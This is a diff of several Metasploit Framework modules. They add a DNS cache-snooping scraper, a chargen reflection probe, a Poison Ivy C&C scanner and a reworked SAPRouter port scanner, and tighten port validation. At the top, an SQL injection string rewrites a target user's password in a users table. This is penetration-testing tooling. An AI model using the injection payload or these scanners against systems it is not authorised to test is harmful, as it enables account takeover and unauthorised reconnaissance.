|
def value_for_newer_schema
|
||||||
|
"1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
|
||||||
|
end
|
||||||
|
|
||||||
|
def value_for_older_schema
|
||||||
|
"1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
|
||||||
|
end
|
||||||
|
end
|
|
@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if ports.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
ports.each_with_index do |port,i|
|
ports.each_with_index do |port,i|
|
||||||
p.tcp_dst = port
|
p.tcp_dst = port
|
||||||
p.tcp_src = rand(64511)+1024
|
p.tcp_src = rand(64511)+1024
|
||||||
|
|
|
@ -0,0 +1,116 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'net/dns/resolver'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'DNS Non-Recursive Record Scraper',
|
||||||
|
'Description' => %q{
|
||||||
|
This module can be used to scrape records that have been cached
|
||||||
|
by a specific nameserver. The module allows the user to test
|
||||||
|
every record from a specified file.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
|
||||||
|
'Rob Dixon "304geek" <rob.dixon[at]accuvant.com>'
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' => [
|
||||||
|
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
|
||||||
|
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
|
||||||
|
]))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('DOMAIN', [ false, "Domain name to query for"]),
|
||||||
|
OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
|
||||||
|
OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
register_advanced_options([
|
||||||
|
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
|
||||||
|
OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to scrape dns
|
||||||
|
def scrape_dns(domain)
|
||||||
|
|
||||||
|
# dns request with recursive disabled
|
||||||
|
use_tcp = datastore['TCP_DNS']
|
||||||
|
res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
|
||||||
|
use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
|
||||||
|
|
||||||
|
# query dns
|
||||||
|
begin
|
||||||
|
query = res.send(domain)
|
||||||
|
rescue ResolverArgumentError
|
||||||
|
print_error("Invalid domain: #{domain}")
|
||||||
|
return
|
||||||
|
rescue NoResponseError
|
||||||
|
print_error("DNS Timeout Issue: #{domain}")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# found or not found
|
||||||
|
if query.answer.empty?
|
||||||
|
vprint_status("#{domain} - Not Found")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
@is_vulnerable = true
|
||||||
|
print_good("#{domain} - Found")
|
||||||
|
report_goods(domain)
|
||||||
|
end
|
||||||
|
|
||||||
|
# method to read each line from file
|
||||||
|
def read_file
|
||||||
|
::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
|
||||||
|
scrape_dns(line.chomp)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# log results to database
|
||||||
|
def report_goods(domain)
|
||||||
|
if datastore['TCP_DNS']
|
||||||
|
proto = "tcp"
|
||||||
|
else
|
||||||
|
proto = "udp"
|
||||||
|
end
|
||||||
|
|
||||||
|
report_note(
|
||||||
|
:host => datastore['NS'],
|
||||||
|
:name => "dns",
|
||||||
|
:port => 53,
|
||||||
|
:proto => proto,
|
||||||
|
:type => "dns.cache.scrape",
|
||||||
|
:data => "#{domain} cached",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
# main control method
|
||||||
|
def run
|
||||||
|
@is_vulnerable = false
|
||||||
|
|
||||||
|
print_status("Making queries against #{datastore['NS']}")
|
||||||
|
|
||||||
|
if datastore['DOMAIN'].blank?
|
||||||
|
read_file
|
||||||
|
else
|
||||||
|
scrape_dns(datastore['DOMAIN'])
|
||||||
|
end
|
||||||
|
|
||||||
|
report_vuln(
|
||||||
|
:host => datastore['NS'],
|
||||||
|
:name => "DNS Cache Snooping",
|
||||||
|
) if @is_vulnerable
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -0,0 +1,68 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Exploit::Remote::Udp
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Chargen Probe Utility',
|
||||||
|
'Description' => %q{
|
||||||
|
Chargen is a debugging and measurement tool and a character
|
||||||
|
generator service. A character generator service simply sends
|
||||||
|
data without regard to the input.
|
||||||
|
Chargen is susceptible to spoofing the source of transmissions
|
||||||
|
as well as use in a reflection attack vector. The misuse of the
|
||||||
|
testing features of the Chargen service may allow attackers to
|
||||||
|
craft malicious network payloads and reflect them by spoofing
|
||||||
|
the transmission source to effectively direct it to a target.
|
||||||
|
This can result in traffic loops and service degradation with
|
||||||
|
large amounts of network traffic.
|
||||||
|
},
|
||||||
|
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
|
||||||
|
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
|
||||||
|
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 08 1996')
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
Opt::RPORT(19)
|
||||||
|
])
|
||||||
|
|
||||||
|
deregister_options('RHOST')
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(rhost)
|
||||||
|
begin
|
||||||
|
connect_udp
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
udp_sock.write(pkt)
|
||||||
|
r = udp_sock.recvfrom(65535, 0.1)
|
||||||
|
|
||||||
|
if r and r[1]
|
||||||
|
vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
|
||||||
|
res = r[0].to_s.strip
|
||||||
|
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
||||||
|
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
||||||
|
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
||||||
|
nil
|
||||||
|
ensure
|
||||||
|
disconnect_udp if self.udp_sock
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@probes << 'probe_pkt_citrix'
|
@probes << 'probe_pkt_citrix'
|
||||||
@probes << 'probe_pkt_pca_st'
|
@probes << 'probe_pkt_pca_st'
|
||||||
@probes << 'probe_pkt_pca_nq'
|
@probes << 'probe_pkt_pca_nq'
|
||||||
|
@probes << 'probe_chargen'
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
case pkt[2]
|
case pkt[2]
|
||||||
|
|
||||||
|
when 19
|
||||||
|
app = 'chargen'
|
||||||
|
return unless chargen_parse(pkt[0])
|
||||||
|
@results[hkey] = true
|
||||||
|
|
||||||
when 53
|
when 53
|
||||||
app = 'DNS'
|
app = 'DNS'
|
||||||
ver = nil
|
ver = nil
|
||||||
|
@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
"#{res[2]}_#{res[1]}"
|
"#{res[2]}_#{res[1]}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Validate a chargen packet.
|
||||||
|
#
|
||||||
|
def chargen_parse(data)
|
||||||
|
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Validate this is truly Citrix ICA; returns true or false.
|
# Validate this is truly Citrix ICA; returns true or false.
|
||||||
#
|
#
|
||||||
|
@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# The probe definitions
|
# The probe definitions
|
||||||
#
|
#
|
||||||
|
|
||||||
|
def probe_chargen(ip)
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
return [pkt, 19]
|
||||||
|
end
|
||||||
|
|
||||||
def probe_pkt_dns(ip)
|
def probe_pkt_dns(ip)
|
||||||
data = [rand(0xffff)].pack('n') +
|
data = [rand(0xffff)].pack('n') +
|
||||||
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
||||||
|
|
|
@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
@probes << 'probe_pkt_citrix'
|
@probes << 'probe_pkt_citrix'
|
||||||
@probes << 'probe_pkt_pca_st'
|
@probes << 'probe_pkt_pca_st'
|
||||||
@probes << 'probe_pkt_pca_nq'
|
@probes << 'probe_pkt_pca_nq'
|
||||||
|
@probes << 'probe_chargen'
|
||||||
end
|
end
|
||||||
|
|
||||||
def setup
|
def setup
|
||||||
|
@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
case sport
|
case sport
|
||||||
|
|
||||||
|
when 19
|
||||||
|
app = 'chargen'
|
||||||
|
ver = nil
|
||||||
|
return unless chargen_parse(data)
|
||||||
|
@results[hkey] = true
|
||||||
|
|
||||||
when 53
|
when 53
|
||||||
app = 'DNS'
|
app = 'DNS'
|
||||||
ver = nil
|
ver = nil
|
||||||
|
@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
|
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Validate a chargen packet.
|
||||||
|
#
|
||||||
|
def chargen_parse(data)
|
||||||
|
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Parse a db2disco packet.
|
# Parse a db2disco packet.
|
||||||
#
|
#
|
||||||
|
@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# The probe definitions
|
# The probe definitions
|
||||||
#
|
#
|
||||||
|
|
||||||
|
def probe_chargen(ip)
|
||||||
|
pkt = Rex::Text.rand_text_alpha_lower(1)
|
||||||
|
return [pkt, 19]
|
||||||
|
end
|
||||||
|
|
||||||
def probe_pkt_dns(ip)
|
def probe_pkt_dns(ip)
|
||||||
data = [rand(0xffff)].pack('n') +
|
data = [rand(0xffff)].pack('n') +
|
||||||
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+
|
||||||
|
|
|
@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
dead = false
|
dead = false
|
||||||
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
|
portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if portlist.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
vprint_status("[#{rhost}] Verifying manual testing is not required...")
|
||||||
|
|
||||||
manual = false
|
manual = false
|
||||||
|
|
|
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if (res and res.body)
|
if (res and res.body)
|
||||||
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
|
||||||
|
|
||||||
if short_name.to_s.strip.empty?
|
if short_name.to_s.strip.empty?
|
||||||
short_name = 'NULL'
|
short_name = 'NULL'
|
||||||
|
|
|
@ -0,0 +1,101 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Poison Ivy Command and Control Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
|
||||||
|
},
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
|
||||||
|
],
|
||||||
|
'Author' => ['SeawolfRN'],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]),
|
||||||
|
OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
|
||||||
|
OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10])
|
||||||
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('RPORT')
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
|
||||||
|
timeout = datastore['TIMEOUT'].to_i
|
||||||
|
|
||||||
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
|
if ports.empty?
|
||||||
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
|
end
|
||||||
|
|
||||||
|
while(ports.length > 0)
|
||||||
|
t = []
|
||||||
|
r = []
|
||||||
|
begin
|
||||||
|
1.upto(datastore['CONCURRENCY']) do
|
||||||
|
this_port = ports.shift
|
||||||
|
break if not this_port
|
||||||
|
t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port|
|
||||||
|
begin
|
||||||
|
s = connect(false,
|
||||||
|
{
|
||||||
|
'RPORT' => port,
|
||||||
|
'RHOST' => ip,
|
||||||
|
'ConnectTimeout' => (timeout / 1000.0)
|
||||||
|
}
|
||||||
|
)
|
||||||
|
r << [ip,port,"open",'Unknown']
|
||||||
|
s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer
|
||||||
|
data = s.get_once(0x100)
|
||||||
|
if data.length == 0x100
|
||||||
|
data = s.get_once(0x4)
|
||||||
|
if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C
|
||||||
|
print_status("#{ip}:#{port} - C&C Server Found")
|
||||||
|
r << [ip,port,"open",'Poison Ivy C&C']
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionRefused
|
||||||
|
vprint_status("#{ip}:#{port} - TCP closed")
|
||||||
|
r << [ip,port,"closed",'']
|
||||||
|
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
||||||
|
rescue ::Rex::Post::Meterpreter::RequestError
|
||||||
|
raise $!
|
||||||
|
ensure
|
||||||
|
disconnect(s) rescue nil
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
t.each {|x| x.join }
|
||||||
|
|
||||||
|
rescue ::Timeout::Error
|
||||||
|
ensure
|
||||||
|
t.each {|x| x.kill rescue nil }
|
||||||
|
end
|
||||||
|
|
||||||
|
r.each do |res|
|
||||||
|
report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3])
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
datastore['RHOST'] = datastore['BOUNCEHOST']
|
datastore['RHOST'] = datastore['BOUNCEHOST']
|
||||||
|
|
|
@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
while(ports.length > 0)
|
while(ports.length > 0)
|
||||||
|
|
|
@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error("Error: No valid ports specified")
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
|
||||||
|
|
|
@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
|
'Royce Davis "R3dy" <rdavis[at]accuvant.com>',
|
||||||
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
|
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
))
|
||||||
|
|
|
@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Auxiliary::Scanner
|
|
||||||
|
VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
|
@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']),
|
OptAddress.new('RHOST', [true, 'SAPRouter address', '']),
|
||||||
OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']),
|
OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']),
|
||||||
|
OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']),
|
||||||
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
|
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
|
||||||
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
|
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
|
||||||
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
|
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
|
||||||
|
@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
|
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
|
||||||
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
|
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
|
||||||
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
|
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
|
||||||
|
OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
deregister_options('RPORT')
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Converts a instance specification like "4,21-23,33" into a sorted,
|
# Converts a instance specification like "4,21-23,33" into a sorted,
|
||||||
|
@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
vprint_error("#{ip}:#{port} - invalid route")
|
vprint_error("#{ip}:#{port} - invalid route")
|
||||||
when /reacheable/
|
when /reacheable/
|
||||||
vprint_error("#{ip}:#{port} - unreachable")
|
vprint_error("#{ip}:#{port} - unreachable")
|
||||||
|
when /hostname '#{ip}' unknown/
|
||||||
|
vprint_error("#{ip}:#{port} - unknown host")
|
||||||
|
when /GetHostByName: '#{ip}' not found/
|
||||||
|
vprint_error("#{ip}:#{port} - unknown host")
|
||||||
|
when /connection to .* timed out/
|
||||||
|
vprint_error("#{ip}:#{port} - connection timed out")
|
||||||
|
when /partner .* not reached/
|
||||||
|
vprint_error("#{ip}:#{port} - host unreachable")
|
||||||
else
|
else
|
||||||
vprint_error("#{ip}:#{port} - unknown error message")
|
vprint_error("#{ip}:#{port} - unknown error message")
|
||||||
end
|
end
|
||||||
|
@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def validate(range)
|
||||||
|
hosts_list = range.split(",")
|
||||||
|
return false if hosts_list.nil? or hosts_list.empty?
|
||||||
|
|
||||||
|
hosts_list.each do |host|
|
||||||
|
unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
|
||||||
|
if datastore['RESOLVE'] == 'remote'
|
||||||
|
range = datastore['TARGETS']
|
||||||
|
unless validate(range)
|
||||||
|
print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
range.split(/,/).each do |host|
|
||||||
|
run_host(host)
|
||||||
|
end
|
||||||
|
else
|
||||||
|
# resolve IP or crack IP range
|
||||||
|
ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS'])
|
||||||
|
ip_list.each do |ip|
|
||||||
|
run_host(ip)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
sap_host = datastore['SAPROUTER_HOST']
|
|
||||||
sap_port = datastore['SAPROUTER_PORT']
|
|
||||||
|
|
||||||
ports = datastore['PORTS']
|
ports = datastore['PORTS']
|
||||||
|
|
||||||
# if port definition has NN then we require INSTANCES
|
# if port definition has NN then we require INSTANCES
|
||||||
|
@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ports = build_sap_ports(ports)
|
ports = build_sap_ports(ports)
|
||||||
|
|
||||||
if ports.empty?
|
if ports.empty?
|
||||||
print_error('Error: No valid ports specified')
|
raise Msf::OptionValidateError.new(['PORTS'])
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Scanning #{ip}")
|
print_status("Scanning #{ip}")
|
||||||
|
@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
begin
|
begin
|
||||||
# create ni_packet to send to saprouter
|
# create ni_packet to send to saprouter
|
||||||
routes = {sap_host => sap_port, ip => port}
|
routes = {rhost => rport, ip => port}
|
||||||
ni_packet = build_ni_packet(routes)
|
ni_packet = build_ni_packet(routes)
|
||||||
|
|
||||||
s = connect(false,
|
s = connect(false)
|
||||||
{
|
|
||||||
'RPORT' => sap_port,
|
|
||||||
'RHOST' => sap_host
|
|
||||||
}
|
|
||||||
)
|
|
||||||
|
|
||||||
s.write(ni_packet, ni_packet.length)
|
s.write(ni_packet, ni_packet.length)
|
||||||
response = s.get()
|
response = s.get()
|
||||||
|
@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused")
|
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
|
||||||
rescue ::Rex::Post::Meterpreter::RequestError
|
rescue ::Rex::Post::Meterpreter::RequestError
|
||||||
|
@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
r.each do |res|
|
r.each do |res|
|
||||||
tbl << [res[0], res[1], res[2], res[3]]
|
tbl << [res[0], res[1], res[2], res[3]]
|
||||||
|
# we can't report if resolution is remote, since host is unknown locally
|
||||||
|
if datastore['RESOLVE'] == 'local'
|
||||||
|
begin
|
||||||
report_service(:host => res[0], :port => res[1], :state => res[2])
|
report_service(:host => res[0], :port => res[1], :state => res[2])
|
||||||
|
rescue ActiveRecord::RecordInvalid
|
||||||
|
# Probably raised because the Address is reserved, for example
|
